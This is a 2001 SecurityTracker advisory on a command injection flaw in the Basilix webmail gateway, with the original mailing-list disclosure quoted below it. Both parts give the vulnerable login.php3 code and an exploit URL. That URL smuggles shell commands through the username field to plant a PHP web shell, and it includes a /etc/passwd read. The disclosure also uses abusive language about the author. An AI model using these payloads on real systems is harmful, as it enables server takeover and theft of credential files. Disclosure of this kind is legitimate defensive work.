Basilix Web Mail Server Will Execute Commands Supplied By Remote Users
|
|
SecurityTracker Alert ID: 1002314 |
|
SecurityTracker URL: http://securitytracker.com/id/1002314
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Updated: Sep 14 2001
|
Original Entry Date: Sep 3 2001
|
Impact:
Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 1.0.2/3 series
|
Description:
A vulnerability was reported in the Basilix web-based email gateway that allows a remtoe user to execute commands on the mail server with the privileges of the web server.
It is reported that a remote user can pass a specially crafted username containing shell commands to the mail gateway to cause it to execute arbitrary commands. Because the Basilix system will first attempt to download email from a valid mail server, the remote user must set up a valid IMAP server in order to trigger the vulnerability. The Basilix system reportedly allows the remote user to specify the IMAP server address and port number as part of the HTTP request.
For example, the remote user can send the username 'blah;cat%20/etc/passwd' to retrieve the password file from the web server. A demonstration exploit string is provided below:
[targethost]/basilix.php3?username=blah;echo%20"<?system(\$cmd);?>">js/blah.php&p
assword=blah&RequestID=LOGIN&domain=blah&bsx_domains[blah][imap_host]=
blah.com.pl&bsx_domains[blah][imap_port]=143&bsx_domains[blah][domain]=su.th3_ti
ck&nocookie=1&BSX_TestCookie=1&SESSID=1
The vulnerable code reportedly exists in the file login.php3, where the system will attempt to create an attachment directory for the user. The user-supplied username is executed by this code:
$atch_dir = $BSX_ATCH_DIR . "/" . "$IMAP_DOMAIN" . "/" ."$username";
.
.
.
$mkcmd = "/bin/mkdir -p $atch_dir";
@exec($mkcmd);
|
Impact:
A remote user can execute arbitrary shell commands on the mail server with the privileges of the web daemon.
|
Solution:
No vendor solution was available at the time of this entry.
|
Vendor URL: www.basilix.org/ (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS:
Linux (Any), UNIX (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 3 Sep 2001 15:49:15 +0200 (CEST)
Subject: fucking basilix bug
|
one small bug, which real sucks :>
--
+---------------------------------+
| Karol Wiesek - appelast |
| Administrator osiris.waw.cdp.pl |
| mailto : appelast@cdp.pl |
+---------------------------------+
Basilix Webmail System - executing command
Version Affected :
Basilix 1.0.2/3 series
Bug:
There is a bug in Basilix package
which allows to execute any command
on attacked system. The bug has been
known since June, but Author of
basilix is a dick so fuck you.
from file login.php3 :
$atch_dir = $BSX_ATCH_DIR . "/" . "$IMAP_DOMAIN" . "/" ."$username";
.
.
.
$mkcmd = "/bin/mkdir -p $atch_dir";
@exec($mkcmd);
we can pass evil username e.g. username=blah;cat%20/etc/passwd
but it will fail because the script tries to connect to imap server
and authenticate with username and password. To pass through this
check we must set up a fake imap server or somethilg like that.
We can pass the address and port of imap server, so it's not a problem.
Example Exploit :
victim.host/basilix.php3?username=blah;echo%20"<?system(\$cmd);?>">js/blah.php&password=
blah&RequestID=LOGIN&domain=blah&bsx_domains[blah][imap_host]=
blah.com.pl&bsx_domains[blah][imap_port]=143&bsx_domains[blah][domain]=
su.th3_tick&nocookie=1&BSX_TestCookie=1&SESSID=1
if you don't write fake imap, you must add username to /etc/passwd
and /etc/shadow and set him password.
directory presents in username (js) should be writable ( normally is ).
you can of course write to tmp or others, but you must use other bug
( see bugtraq, also mine ;) to access it.
last three variables are set to stop script to check if cookies are set. <- stupid sentence
Karol Wiesek - appelast<appelast@cdp.pl>
|
|
